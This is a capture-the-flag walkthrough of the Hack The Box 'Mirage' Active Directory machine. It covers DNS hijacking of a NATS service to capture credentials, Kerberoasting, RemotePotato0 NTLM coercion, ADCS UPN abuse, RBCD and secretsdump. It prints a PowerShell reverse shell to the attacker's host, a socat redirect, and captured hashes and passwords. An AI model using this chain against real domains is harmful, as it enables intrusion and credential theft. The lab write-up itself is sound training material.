└─$ nmap -sS -p---min-rate 1000010.129.248.59-Pn -oA nmap_portsStarting Nmap 7.95(<https://nmap.org> ) at 2025-07-21 17:08 ISTWarning:10.129.248.59 giving up on port because retransmission cap hit (10).RTTVAR has grown to over 2.3 seconds, decreasing to 2.0RTTVAR has grown to over 2.3 seconds, decreasing to 2.0RTTVAR has grown to over 2.3 seconds, decreasing to 2.0RTTVAR has grown to over 2.3 seconds, decreasing to 2.0RTTVAR has grown to over 2.3 seconds, decreasing to 2.0RTTVAR has grown to over 2.3 seconds, decreasing to 2.0RTTVAR has grown to over 2.3 seconds, decreasing to 2.0RTTVAR has grown to over 2.3 seconds, decreasing to 2.0RTTVAR has grown to over 2.3 seconds, decreasing to 2.0RTTVAR has grown to over 2.3 seconds, decreasing to 2.0Nmap scan report for10.129.248.59Host is up (0.66s latency).Notshown:35568 closed tcp ports (reset),29941 filtered tcp ports (no-response)PORTSTATESERVICE53/tcp open domain88/tcp open kerberos-sec111/tcp open rpcbind135/tcp open msrpc139/tcp open netbios-ssn389/tcp open ldap445/tcp open microsoft-ds464/tcp open kpasswd5593/tcp open http-rpc-epmap636/tcp open ldapssl2049/tcp open nfs3268/tcp open globalcatLDAP3269/tcp open globalcatLDAPssl4222/tcp open vrml-multi-use5985/tcp open wsman9389/tcp open adws47001/tcp open winrm49666/tcp open unknown49667/tcp open unknown49669/tcp open unknown50586/tcp open unknown56754/tcp open unknown56768/tcp open unknown64708/tcp open unknown64717/tcp open unknown64733/tcp open unknownNmapdone:1IPaddress (1 host up) scanned in 79.77 seconds
Port 2049
Let’s see the mount
Foothold/ shell
Shell as nathan.aadam
mounting the share
We can see a MirageReports share available for everyone. Let's mount it and take a look inside.
We can see two pdfs
Analysing PDF
Let's first take a look at the Incident Report Missing DNS Record nats-svc
On May 3, 2025, the Development team reported they were unable to resolve the hostname nats-svc.mirage.htb. This hostname is critical for internal service communication with the NATS messaging system hosted on the Mirage domain.
Another interesting finding in this report is that Dynamic Updates for the mirage.htb zone is set to Nonsecure and secure which means that we should be able to make dns changes without any authentication.
Next let's take a look at Mirage Authentication Hardening Report
This report outlines the phased deprecation of NTLM authentication within the Mirage Active Directory environment. NTLM is a legacy authentication protocol that lacks modern security features and is vulnerable to several attacks, including credential relaying and pass-the-hash. To align with current security best practices, Mirage is moving toward a Kerberos-only authentication model. The transition is designed to be gradual and well-monitored to avoid service disruption and ensure all systems are compliant.
Hijacking nats-svc.mirage.htb via Dynamic DNS Update
What is NATS?
NATS (pronounced “gnats”) is a high-performance messaging system — basically, it's a message broker that allows different services to communicate via publish-subscribe messaging.
Key concepts
Concept
Meaning
Client
An app or service that connects to NATS to send or receive messages.
Server
The central broker that routes all messages.
Subject
A topic string, like "alerts.critical" or "users.login".
Publish
A client sends a message to a subject.
Subscribe
A client listens for messages on a subject (like a channel).
JetStream
NATS's persistent storage feature — kind of like a message queue with history, replay, etc.
Think of NATS like a lightweight, turbo-fast post office inside a network:
Apps "drop" letters into named mailboxes (subjects)
Other apps are "subscribed" to those mailboxes and receive the letters in real time
NATS ensures delivery happens quickly and efficiently
With JetStream, NATS can even store the letters for later
EXPLOIT
We are going to exploit a misconfigured DNS server that allowed nonsecure dynamic updates for the mirage.htb domain. This will allow us to hijack the hostnamenats-svc.mirage.htb and point it to our machine, where we ran a fake NATS server.
As a result, an internal service connected to our fake NATS server and sent credentials in a CONNECT message.
But before that we need to get the server_id, server_name, version, etc.
We started a listener on port 4222 (default NATS port):
This sends a fake INFO banner (expected by NATS clients).
We're using Netcat (nc) to passively accept connections and reply.
Hijack nats-svc.mirage.htb via Dynamic DNS
This sends a DNS dynamic update, making nats-svc.mirage.htb resolve to our IP (10.10.16.7) instead of the real NATS server.
⚠️ Requires that the DNS server allows "nonsecure and secure" dynamic updates (as stated in the incident report).
After a short wait, we received this on our listener:
Now we have Dev_account_A ccredentials
AD Access
Attempting to use these against the AD environment doesn't grant authentication. Since these were credentials we got from nats Let's try to authenticate through that
We will use natcli to connect to the NAT server via Dev_account_A
Let’s take a look t our streams
Let’s take a look at the auth_logs
We have a new set of credentials! david.jjackson:pN8kQmn6b86!1234@
Let's check if we're able to authenticate to AD through ldap.
need to forge ticket
Bloodhound
Since we have valid cred we can use bloodhound-python
and NATHAN.AADAM@MIRAGE.HTB -> MemberOf -> IT_ADMINS@MIRAGE.HTB
Kerberaosting
NATHAN.AADAM@MIRAGE.HTB has its SPN set as HTTP/exchange.mirage.htb
Therefore, we can try a kerberoasting attack
We got the hash, we can try to crack it via hashcat
Now we have Nathan’s cred
and we have user.txt
Privilege Escalation
Authenticate as Mark.Bbond
First, we need to upgrade our evil-winrm session to an interactive session. This way, we'll obtain more enumeration capabilities:
We can see in our groups we now are in NT AUTHORITY\\INTERACTIVE, granting us with more enumeration capabilities. Let's see if another account is connected to the box:
We can see mark.bbond is connected to the box with session ID 1. We can use an universal no fix exploit allowing to retrieve the NTLMv2 response of this user called RemotePotato0.exe:
Now we have the mark.bbond hash we can crack it via hashcat
Why this worked (chatgpt)
This was privilege escalation via NTLM relay using RemotePotato0, targeting a user who is actively logged in to the system (mark.bbond). Here's why it worked and how the pieces fit together technically:
Why This Worked: High-Level Overview
We exploited the COM infrastructure and NTLM authentication behavior of Windows to force an already-logged-in privileged user (mark.bbond) to authenticate to a fake RPC server we controlled — and then captured the NTLMv2 response.
This is possible because:
We had enough local privileges (as nathan.aadam) to spawn a COM object in another user’s session.
That COM object used NTLM authentication when connecting to resources.
We redirected RPC traffic (port 135) using socat, so authentication flowed to our fake listener, not the real one.
RemotePotato0 relayed the authentication to your listener and captured the NTLMv2 hash.
Detailed Breakdown: Step-by-Step
We got a better shell via runasc.exe
We used runasc.exe to impersonate user nathan.aadam interactively:
This opened a new interactive PowerShell reverse shell to our attacker box (10.10.16.11:1234).
The new shell had NT AUTHORITY\\INTERACTIVE, allowing access to more desktop and session-related features (like COM object spawning into other sessions).
We found a privileged user logged in
Using qwinsta:
We saw:
Meaning mark.bbond is actively logged in with session ID 1. This is crucial — RemotePotato0 needs a target user session to spawn a COM object into
We ran RemotePotato0 to force NTLM authentication
This:
Uses mode 2 (DCOM-based coercion)
Uses server mode 1 (your fake RPC/HTTP relay server)
Sends NTLM authentication to your attack box (-x 10.10.16.11)
We used socat to forward port 135 to our fake RPC listener
On our attacker box:
This:
Listens on port 135 locally
Redirects any DCOM traffic to port 9999 on the target box (our victim)
Enables RemotePotato0 to intercept and handle RPC/COM calls (ResolveOxid2)
RemotePotato0 impersonated mark.bbond using COM
It:
Used StandardGetInstanceFromIStorage to spawn a COM object inside session 1 (mark.bbond)
That object tried to authenticate via NTLM to a remote resource — our listener at port 135 (really redirected to our port 9999)
We captured the NTLMv2 challenge-response hash
We saw:
How It Works Technically (RPC + COM + NTLM)
COM Activation: Windows allows you to activate COM objects in other user sessions under certain conditions (like being interactive).
NTLM Authentication: When the COM object is initialized, it may attempt to authenticate over RPC using the context of the user it runs as (mark.bbond).
ResolveOxid2 Call: This call is made over DCOM (port 135), and authentication occurs via NTLM challenge-response.
NTLM Relay: You redirected this call to a controlled service that sniffed and captured the NTLMv2 hash — a credential you can now crack or relay.
The account is locked out due to too many login attempts.
The account is expired or otherwise marked as invalid for Kerberos login.
Let’s check if the account is disable or not
Let’s remove this property
Still getting KDC_ERR_CLIENT_REVOKED
If logonHours is set and you're trying to authenticate outside the permitted window, Kerberos and NTLM authentication will fail, potentially with the error:
❌ KDC_ERR_CLIENT_REVOKED
Even though the user’s password is correct and the account is active.
This means the logonHours attribute is empty, which in Active Directory means:
Step 1: Read the initial UPN of the victim account (Optional - for restoration).
Step 2: Update the victim account's UPN to the target DC's sAMAccountName (suffixed with the domain). The target is the DC's machine account, DC$. We set the victim's UPN to dc01$@mirage.htb.
Step 3: Obtain credentials for the "victim" account (if not already known) and set up Kerberos ccache. Set the Kerberos credential cache environment variable (shell command):
Step 4: Request a client authentication certificate as the "victim" user.victimThe certificate will be legitimately issued to the account (and its SID will be embedded if the template includes the SID security extension), but the UPN in its SAN will be the manipulated dc$@corp.local.
Step 5: Revert the "victim" account's UPN to its original value.( remember to authenticate as MIRAGE-SERVICE$ before doing so**)**
Step 6: Authenticate to LDAPS (Schannel) as the target DC using the certificate. Certipy's auth command with the -ldap-shell option will attempt to connect to the DC's LDAPS port (636) using the provided certificate for Schannel client authentication.
RBCD
We have the DC01$ ldap access, let's allow our machine account to RBCD
We will use ldap-shell
Secretsdump
Now we will use S4U2Self to impersonate Administrator
This generates a service ticket to cifs/dc01.mirage.htb for Administrator, usable by Mirage-Service$.
Now we can secretsdump
We can obtain a shell as Administrator with his NThash:
─$ nmap -sC -sV -p 53,88,111,135,139,389,445,464,593,636,2049,3268,3269,4222,5985,9389,47001,49666,49667,49669,50586,56754,56768,64708,64717,64733 10.129.248.59 -Pn -oA nmap_port_details
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-07-21 17:22 IST
Nmap scan report for 10.129.248.59
Host is up (0.41s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-07-21 18:52:15Z)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Not valid before: 2025-07-04T19:58:41
|_Not valid after: 2105-07-04T19:58:41
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Not valid before: 2025-07-04T19:58:41
|_Not valid after: 2105-07-04T19:58:41
|_ssl-date: TLS randomness does not represent time
2049/tcp open nlockmgr 1-4 (RPC #100021)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Not valid before: 2025-07-04T19:58:41
|_Not valid after: 2105-07-04T19:58:41
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Not valid before: 2025-07-04T19:58:41
|_Not valid after: 2105-07-04T19:58:41
|_ssl-date: TLS randomness does not represent time
4222/tcp open vrml-multi-use?
| fingerprint-strings:
| GenericLines:
| INFO {"server_id":"NBBDG7EENJOUNKBCOERCNKVWUMXKEFXEIMNQIIVNL5AYWADYM6357W5F","server_name":"NBBDG7EENJOUNKBCOERCNKVWUMXKEFXEIMNQIIVNL5AYWADYM6357W5F","version":"2.11.3","proto":1,"git_commit":"a82cfda","go":"go1.24.2","host":"0.0.0.0","port":4222,"headers":true,"auth_required":true,"max_payload":1048576,"jetstream":true,"client_id":734,"client_ip":"10.10.16.7","xkey":"XBZCN2J5PXXZKRARPYRMZDVKMUIYINPFJGAG5HDA62RTA5HJ77MRPBEV"}
| -ERR 'Authorization Violation'
| GetRequest:
| INFO {"server_id":"NBBDG7EENJOUNKBCOERCNKVWUMXKEFXEIMNQIIVNL5AYWADYM6357W5F","server_name":"NBBDG7EENJOUNKBCOERCNKVWUMXKEFXEIMNQIIVNL5AYWADYM6357W5F","version":"2.11.3","proto":1,"git_commit":"a82cfda","go":"go1.24.2","host":"0.0.0.0","port":4222,"headers":true,"auth_required":true,"max_payload":1048576,"jetstream":true,"client_id":735,"client_ip":"10.10.16.7","xkey":"XBZCN2J5PXXZKRARPYRMZDVKMUIYINPFJGAG5HDA62RTA5HJ77MRPBEV"}
| -ERR 'Authorization Violation'
| HTTPOptions:
| INFO {"server_id":"NBBDG7EENJOUNKBCOERCNKVWUMXKEFXEIMNQIIVNL5AYWADYM6357W5F","server_name":"NBBDG7EENJOUNKBCOERCNKVWUMXKEFXEIMNQIIVNL5AYWADYM6357W5F","version":"2.11.3","proto":1,"git_commit":"a82cfda","go":"go1.24.2","host":"0.0.0.0","port":4222,"headers":true,"auth_required":true,"max_payload":1048576,"jetstream":true,"client_id":736,"client_ip":"10.10.16.7","xkey":"XBZCN2J5PXXZKRARPYRMZDVKMUIYINPFJGAG5HDA62RTA5HJ77MRPBEV"}
| -ERR 'Authorization Violation'
| NULL:
| INFO {"server_id":"NBBDG7EENJOUNKBCOERCNKVWUMXKEFXEIMNQIIVNL5AYWADYM6357W5F","server_name":"NBBDG7EENJOUNKBCOERCNKVWUMXKEFXEIMNQIIVNL5AYWADYM6357W5F","version":"2.11.3","proto":1,"git_commit":"a82cfda","go":"go1.24.2","host":"0.0.0.0","port":4222,"headers":true,"auth_required":true,"max_payload":1048576,"jetstream":true,"client_id":733,"client_ip":"10.10.16.7","xkey":"XBZCN2J5PXXZKRARPYRMZDVKMUIYINPFJGAG5HDA62RTA5HJ77MRPBEV"}
|_ -ERR 'Authentication Timeout'
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
50586/tcp open msrpc Microsoft Windows RPC
56754/tcp open msrpc Microsoft Windows RPC
56768/tcp open msrpc Microsoft Windows RPC
64708/tcp open msrpc Microsoft Windows RPC
64717/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
64733/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at <https://nmap.org/cgi-bin/submit.cgi?new-service> :
SF-Port4222-TCP:V=7.95%I=7%D=7/21%Time=687E29E8%P=x86_64-pc-linux-gnu%r(NU
SF:LL,1CF,"INFO\\x20{\\"server_id\\":\\"NBBDG7EENJOUNKBCOERCNKVWUMXKEFXEIMNQII
SF:VNL5AYWADYM6357W5F\\",\\"server_name\\":\\"NBBDG7EENJOUNKBCOERCNKVWUMXKEFXE
SF:IMNQIIVNL5AYWADYM6357W5F\\",\\"version\\":\\"2\\.11\\.3\\",\\"proto\\":1,\\"git_c
SF:ommit\\":\\"a82cfda\\",\\"go\\":\\"go1\\.24\\.2\\",\\"host\\":\\"0\\.0\\.0\\.0\\",\\"por
SF:t\\":4222,\\"headers\\":true,\\"auth_required\\":true,\\"max_payload\\":104857
SF:6,\\"jetstream\\":true,\\"client_id\\":733,\\"client_ip\\":\\"10\\.10\\.16\\.7\\",
SF:\\"xkey\\":\\"XBZCN2J5PXXZKRARPYRMZDVKMUIYINPFJGAG5HDA62RTA5HJ77MRPBEV\\"}\\
SF:x20\\r\\n-ERR\\x20'Authentication\\x20Timeout'\\r\\n")%r(GenericLines,1D0,"IN
SF:FO\\x20{\\"server_id\\":\\"NBBDG7EENJOUNKBCOERCNKVWUMXKEFXEIMNQIIVNL5AYWADY
SF:M6357W5F\\",\\"server_name\\":\\"NBBDG7EENJOUNKBCOERCNKVWUMXKEFXEIMNQIIVNL5
SF:AYWADYM6357W5F\\",\\"version\\":\\"2\\.11\\.3\\",\\"proto\\":1,\\"git_commit\\":\\"
SF:a82cfda\\",\\"go\\":\\"go1\\.24\\.2\\",\\"host\\":\\"0\\.0\\.0\\.0\\",\\"port\\":4222,\\
SF:"headers\\":true,\\"auth_required\\":true,\\"max_payload\\":1048576,\\"jetstr
SF:eam\\":true,\\"client_id\\":734,\\"client_ip\\":\\"10\\.10\\.16\\.7\\",\\"xkey\\":\\
SF:"XBZCN2J5PXXZKRARPYRMZDVKMUIYINPFJGAG5HDA62RTA5HJ77MRPBEV\\"}\\x20\\r\\n-ER
SF:R\\x20'Authorization\\x20Violation'\\r\\n")%r(GetRequest,1D0,"INFO\\x20{\\"se
SF:rver_id\\":\\"NBBDG7EENJOUNKBCOERCNKVWUMXKEFXEIMNQIIVNL5AYWADYM6357W5F\\",
SF:\\"server_name\\":\\"NBBDG7EENJOUNKBCOERCNKVWUMXKEFXEIMNQIIVNL5AYWADYM6357
SF:W5F\\",\\"version\\":\\"2\\.11\\.3\\",\\"proto\\":1,\\"git_commit\\":\\"a82cfda\\",\\
SF:"go\\":\\"go1\\.24\\.2\\",\\"host\\":\\"0\\.0\\.0\\.0\\",\\"port\\":4222,\\"headers\\":
SF:true,\\"auth_required\\":true,\\"max_payload\\":1048576,\\"jetstream\\":true,
SF:\\"client_id\\":735,\\"client_ip\\":\\"10\\.10\\.16\\.7\\",\\"xkey\\":\\"XBZCN2J5PX
SF:XZKRARPYRMZDVKMUIYINPFJGAG5HDA62RTA5HJ77MRPBEV\\"}\\x20\\r\\n-ERR\\x20'Autho
SF:rization\\x20Violation'\\r\\n")%r(HTTPOptions,1D0,"INFO\\x20{\\"server_id\\":
SF:\\"NBBDG7EENJOUNKBCOERCNKVWUMXKEFXEIMNQIIVNL5AYWADYM6357W5F\\",\\"server_n
SF:ame\\":\\"NBBDG7EENJOUNKBCOERCNKVWUMXKEFXEIMNQIIVNL5AYWADYM6357W5F\\",\\"ve
SF:rsion\\":\\"2\\.11\\.3\\",\\"proto\\":1,\\"git_commit\\":\\"a82cfda\\",\\"go\\":\\"go
SF:1\\.24\\.2\\",\\"host\\":\\"0\\.0\\.0\\.0\\",\\"port\\":4222,\\"headers\\":true,\\"aut
SF:h_required\\":true,\\"max_payload\\":1048576,\\"jetstream\\":true,\\"client_i
SF:d\\":736,\\"client_ip\\":\\"10\\.10\\.16\\.7\\",\\"xkey\\":\\"XBZCN2J5PXXZKRARPYRM
SF:ZDVKMUIYINPFJGAG5HDA62RTA5HJ77MRPBEV\\"}\\x20\\r\\n-ERR\\x20'Authorization\\x
SF:20Violation'\\r\\n");
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-07-21T18:53:32
|_ start_date: N/A
|_clock-skew: 7h00m02s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 462.35 seconds
└─$ showmount -e 10.129.248.59
Export list for 10.129.248.59:
/MirageReports (everyone
└─$ sudo mount -t nfs 10.129.248.59:/MirageReports /mnt/
└─$ sudo ls /mnt
Incident_Report_Missing_DNS_Record_nats-svc.pdf Mirage_Authentication_Hardening_Report.pdf
└─$ nc nat-svc.mirage.htb 4222
INFO {"server_id":"NBBDG7EENJOUNKBCOERCNKVWUMXKEFXEIMNQIIVNL5AYWADYM6357W5F","server_name":"NBBDG7EENJOUNKBCOERCNKVWUMXKEFXEIMNQIIVNL5AYWADYM6357W5F","version":"2.11.3","proto":1,"git_commit":"a82cfda","go":"go1.24.2","host":"0.0.0.0","port":4222,"headers":true,"auth_required":true,"max_payload":1048576,"jetstream":true,"client_id":832,"client_ip":"10.10.16.7","xkey":"XBZCN2J5PXXZKRARPYRMZDVKMUIYINPFJGAG5HDA62RTA5HJ77MRPBEV"}
-ERR 'Authentication Timeout'
┌──(anurag㉿anurag)-[~/htb/Mirage]
└─$ export KRB5_CONFIG=./krb5.conf
└─$ kinit NATHAN.AADAM@MIRAGE.HTB
Password for NATHAN.AADAM@MIRAGE.HTB:
└─$ evil-winrm -i dc01.mirage.htb -r mirage.htb
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: <https://github.com/Hackplayers/evil-winrm#Remote-path-completion>
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\\Users\\nathan.aadam\\Documents> dir C:\\Users\\nathan.aadam\\Desktop\\
Directory: C:\\Users\\nathan.aadam\\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 7/4/2025 1:01 PM 2312 Microsoft Edge.lnk
-ar--- 7/20/2025 11:39 PM 34 user.txt
*Evil-WinRM* PS C:\\Users\\nathan.aadam\\Documents>
*Evil-WinRM* PS C:\\temp> .\\runasc.exe nathan.aadam 3edc#EDC3 powershell -r 10.10.16.11:1234
[*] Warning: The logon for user 'nathan.aadam' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\\Desktop: Service-0x0-1d94dd4$\\Default
[+] Async process 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe' with pid 2220 created in background.
┌──(anurag㉿anurag)-[~/htb/Mirage]
└─$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.16.11] from (UNKNOWN) [10.129.195.48] 56110
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! <https://aka.ms/PSWindows>
PS C:\\Windows\\system32> whoami /all
whoami /all
USER INFORMATION
----------------
User Name SID
=================== ==============================================
mirage\\nathan.aadam S-1-5-21-2127163471-3824721834-2568365109-1110
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============================================== ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Group used for deny only
BUILTIN\\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
BUILTIN\\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
MIRAGE\\Exchange_Admins Group S-1-5-21-2127163471-3824721834-2568365109-2601 Mandatory group, Enabled by default, Enabled group
MIRAGE\\IT_Admins Group S-1-5-21-2127163471-3824721834-2568365109-1106 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
PS C:\\Windows\\system32>
PS C:\\Windows\\system32> qwinsta
qwinsta
SESSIONNAME USERNAME ID STATE TYPE DEVICE
>services 0 Disc
console mark.bbond 1 Active
PS C:\\Windows\\system32>
#on our machine
└─$ socat -v TCP-LISTEN:135,fork,reuseaddr TCP:10.129.195.48:9999
#on box
PS C:\\temp> .\\RemotePotato0.exe -m 2 -s 1 -x 10.10.16.11
.\\RemotePotato0.exe -m 2 -s 1 -x 10.10.16.11
[*] Detected a Windows Server version not compatible with JuicyPotato. RogueOxidResolver must be run remotely. Remember to forward tcp port 135 on (null) to your victim machine on port 9999
[*] Example Network redirector:
sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:{{ThisMachineIp}}:9999
[*] Starting the RPC server to capture the credentials hash from the user authentication!!
[*] RPC relay server listening on port 9997 ...
[*] Starting RogueOxidResolver RPC Server listening on port 9999 ...
[*] Spawning COM object in the session: 1
[*] Calling StandardGetInstanceFromIStorage with CLSID:{5167B42F-C111-47A1-ACC4-8EABE61B0B54}
[*] IStoragetrigger written: 104 bytes
[*] ServerAlive2 RPC Call
[*] ResolveOxid2 RPC call
[+] Received the relayed authentication on the RPC relay server on port 9997
[*] Connected to RPC Server 127.0.0.1 on port 9999
[+] User hash stolen!
NTLMv2 Client : DC01
NTLMv2 Username : MIRAGE\\mark.bbond
NTLMv2 Hash : mark.bbond::MIRAGE:7013e4ac202a8922:26ca9686e9654d2f934fc9cfe36214ee:0101000000000000a11d07624bfbdb01f23c6dc1779606910000000002000c004d0049005200410047004500010008004400430030003100040014006d00690072006100670065002e0068007400620003001e0064006300300031002e006d00690072006100670065002e00680074006200050014006d00690072006100670065002e0068007400620007000800a11d07624bfbdb0106000400060000000800300030000000000000000100000000200000e217b7bc8776c4fa1a8b008d2ee9e05697e814c38c252fa149b54d0c553451b90a00100000000000000000000000000000000000090000000000000000000000
PS C:\\temp>
└─$ bloodyAD --host dc01.mirage.htb -d mirage.htb -u 'MARK.BBOND' -p '1day@atime' -k set object "javier.mmarshall" logonHours
[!] Attribute encoding not supported for logonHours with bytes attribute type, using raw mode
[+] javier.mmarshall's logonHours has been updated
┌──(anurag㉿anurag)-[~/htb/Mirage]
└─$ export KRB5_CONFIG=./krb5.conf
┌──(anurag㉿anurag)-[~/htb/Mirage]
└─$ kinit mark.bbond@MIRAGE.HTB
Password for mark.bbond@MIRAGE.HTB:
┌──(anurag㉿anurag)-[~/htb/Mirage]
└─$ klist
Ticket cache: FILE:MIRAGE-SERVICE$.ccache
Default principal: mark.bbond@MIRAGE.HTB
Valid starting Expires Service principal
07/25/25 02:05:17 07/25/25 12:05:17 krbtgt/MIRAGE.HTB@MIRAGE.HTB
renew until 07/26/25 02:05:10
└─$ certipy req -k -dc-ip '10.10.11.78' -target 'dc01.mirage.htb' -ca 'Mirage-DC01-CA' -template 'User'
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[!] DC host (-dc-host) not specified and Kerberos authentication is used. This might fail
[*] Requesting certificate via RPC
[*] Request ID is 11
[*] Successfully requested certificate
[*] Got certificate with UPN 'dc01$@mirage.htb'
[*] Certificate object SID is 'S-1-5-21-2127163471-3824721834-2568365109-1109'
[*] Saving certificate and private key to 'dc01.pfx'
[*] Wrote certificate and private key to 'dc01.pfx'
└─$ certipy auth -pfx dc01.pfx -dc-ip 10.10.11.78 -ldap-shell
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'dc01$@mirage.htb'
[*] Security Extension SID: 'S-1-5-21-2127163471-3824721834-2568365109-1109'
[*] Connecting to 'ldaps://10.10.11.78:636'
[*] Authenticated to '10.10.11.78' as: 'u:MIRAGE\\\\DC01$'
Type help for list of commands
# whoami
u:MIRAGE\\DC01$
# set_rbcd dc01$ mirage-service$
Found Target DN: CN=DC01,OU=Domain Controllers,DC=mirage,DC=htb
Target SID: S-1-5-21-2127163471-3824721834-2568365109-1000
Found Grantee DN: CN=Mirage-Service,CN=Managed Service Accounts,DC=mirage,DC=htb
Grantee SID: S-1-5-21-2127163471-3824721834-2568365109-1112
Delegation rights modified successfully!
mirage-service$ can now impersonate users on dc01$ via S4U2Proxy
#
